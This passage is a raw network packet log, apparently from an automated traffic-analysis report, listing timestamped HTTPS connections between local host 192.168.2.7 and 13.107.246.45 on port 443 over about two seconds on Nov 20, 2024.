                                                                                                                                                                                                Nov 20, 2024 10:55:00.058749914 CET4435005713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.058971882 CET50057443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.058990002 CET4435005713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.059003115 CET50057443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.059007883 CET4435005713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.061311960 CET50064443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.061327934 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.061388969 CET50064443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.063592911 CET50064443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.063604116 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.067888021 CET50065443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.067918062 CET4435006513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.067990065 CET50065443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.068336010 CET50065443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.068348885 CET4435006513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.274888039 CET4435005913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.275566101 CET50059443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.275582075 CET4435005913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.276388884 CET50059443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.276392937 CET4435005913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.359204054 CET4435006013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.359832048 CET50060443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.359849930 CET4435006013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.360656977 CET50060443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.360661983 CET4435006013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.381891012 CET4435005913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.382041931 CET4435005913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.382380962 CET50059443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.382646084 CET50059443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.382659912 CET4435005913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.388787031 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.388825893 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.388957977 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.390068054 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.390081882 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.466511965 CET4435006013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.466588020 CET4435006013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.466748953 CET50060443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.466878891 CET50060443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.466900110 CET4435006013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.466901064 CET50060443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.466907978 CET4435006013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.469491005 CET50068443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.469511986 CET4435006813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.469594955 CET50068443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.469940901 CET50068443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.469952106 CET4435006813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.693742990 CET4435006313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.696058989 CET50063443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.696065903 CET4435006313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.696628094 CET50063443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.696633101 CET4435006313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.733213902 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.733864069 CET50064443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.733880043 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.734344959 CET50064443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.734349966 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.746793032 CET4435006513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.747622967 CET50065443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.747646093 CET4435006513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.748166084 CET50065443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.748171091 CET4435006513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.800826073 CET4435006313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.801109076 CET4435006313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.801233053 CET50063443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.801256895 CET50063443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.801268101 CET4435006313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.801279068 CET50063443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.801284075 CET4435006313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.803920031 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.803936958 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.804080963 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.804183006 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.804193974 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.839744091 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.839796066 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.839848995 CET50064443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.839858055 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.839932919 CET50064443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.839939117 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.839966059 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.840018988 CET50064443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.840086937 CET50064443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.840091944 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.840116024 CET50064443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.840122938 CET4435006413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.842669964 CET50071443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.842700005 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.842770100 CET50071443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.842937946 CET50071443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.842952013 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.853671074 CET4435006513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.853748083 CET4435006513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.853815079 CET50065443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.853827000 CET4435006513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.853910923 CET50065443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.853910923 CET50065443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.853919029 CET4435006513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.853986025 CET4435006513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.856201887 CET50072443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.856226921 CET4435007213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:00.856406927 CET50072443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.856569052 CET50072443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:00.856585026 CET4435007213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.129627943 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.130126953 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.130136013 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.130697012 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.130701065 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.153722048 CET4435006813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.154160976 CET50068443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.154171944 CET4435006813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.154627085 CET50068443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.154632092 CET4435006813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.233364105 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.233392000 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.233411074 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.233470917 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.233480930 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.233524084 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.261382103 CET4435006813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.261461973 CET4435006813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.261580944 CET50068443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.261588097 CET4435006813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.261676073 CET50068443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.265623093 CET50068443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.265635967 CET4435006813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.265645981 CET50068443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.265650988 CET4435006813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.269675016 CET50073443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.269725084 CET4435007313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.269788980 CET50073443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.270088911 CET50073443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.270102978 CET4435007313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.330154896 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.330229998 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.330240965 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.330254078 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.330342054 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.330784082 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.330801964 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.330811024 CET50067443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.330817938 CET4435006713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.334484100 CET50074443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.334512949 CET4435007413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.334579945 CET50074443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.334745884 CET50074443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.334760904 CET4435007413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.486618996 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.487090111 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.487099886 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.487581015 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.487586021 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.507477999 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.507879972 CET50071443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.507891893 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.508294106 CET50071443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.508299112 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.522284985 CET4435007213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.522622108 CET50072443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.522641897 CET4435007213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.523014069 CET50072443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.523021936 CET4435007213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.595690966 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.595758915 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.595803976 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.595838070 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.595845938 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.595911980 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.612401962 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.612457037 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.612536907 CET50071443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.612548113 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.612581015 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.612636089 CET50071443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.622143984 CET50071443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.622154951 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.622167110 CET50071443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.622172117 CET4435007113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.625808001 CET50075443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.625840902 CET4435007513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.625938892 CET50075443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.626063108 CET50075443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.626080036 CET4435007513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.627477884 CET4435007213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.627502918 CET4435007213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.627559900 CET4435007213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.627563000 CET50072443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.627600908 CET50072443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.627748013 CET50072443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.627763987 CET4435007213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.627778053 CET50072443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.627784967 CET4435007213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.629970074 CET50076443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.630048990 CET4435007613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.630171061 CET50076443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.630295992 CET50076443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.630316019 CET4435007613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.683903933 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.683954000 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.684015989 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.684031963 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.684082031 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.684082031 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.684092999 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.684174061 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.684174061 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.684174061 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.686938047 CET50077443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.686991930 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.687133074 CET50077443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.687249899 CET50077443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.687267065 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.917052031 CET4435007313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.917664051 CET50073443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.917687893 CET4435007313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.918386936 CET50073443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.918400049 CET4435007313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.970048904 CET4435007413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.970546961 CET50074443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.970570087 CET4435007413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:01.971055984 CET50074443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:01.971065044 CET4435007413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.019155979 CET4435007313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.019553900 CET4435007313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.019613028 CET50073443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.019648075 CET50073443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.019665003 CET4435007313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.019675016 CET50073443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.019680977 CET4435007313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.022401094 CET50078443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.022475004 CET4435007813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.022562981 CET50078443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.022702932 CET50078443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.022722006 CET4435007813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.054672003 CET50070443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.054697037 CET4435007013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.072195053 CET4435007413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.072262049 CET4435007413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.072457075 CET50074443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.072494030 CET50074443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.072494030 CET50074443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.072513103 CET4435007413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.072518110 CET4435007413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.075089931 CET50079443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.075131893 CET4435007913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.075305939 CET50079443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.075565100 CET50079443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.075579882 CET4435007913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.304989100 CET4435007513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.305428982 CET50075443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.305449009 CET4435007513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.306109905 CET50075443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.306114912 CET4435007513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.313393116 CET4435007613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.313925982 CET50076443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.314008951 CET4435007613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.314435005 CET50076443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.314454079 CET4435007613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.332653046 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.332989931 CET50077443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.333019018 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.333410978 CET50077443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.333417892 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.409794092 CET4435007513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.409919977 CET4435007513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.409991980 CET50075443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.419745922 CET4435007613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.420041084 CET4435007613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.420188904 CET50076443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.430389881 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.431394100 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.431467056 CET50077443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.431480885 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.431503057 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.431549072 CET50077443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.443331957 CET50075443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.443331957 CET50075443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.443351984 CET4435007513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.443362951 CET4435007513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.449810028 CET50076443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.449810028 CET50076443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.449866056 CET4435007613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.449892998 CET4435007613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.451045990 CET50077443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.451045990 CET50077443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.451066017 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.451071978 CET4435007713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.482309103 CET50080443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.482333899 CET4435008013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.482435942 CET50080443192.168.2.713.107.246.45
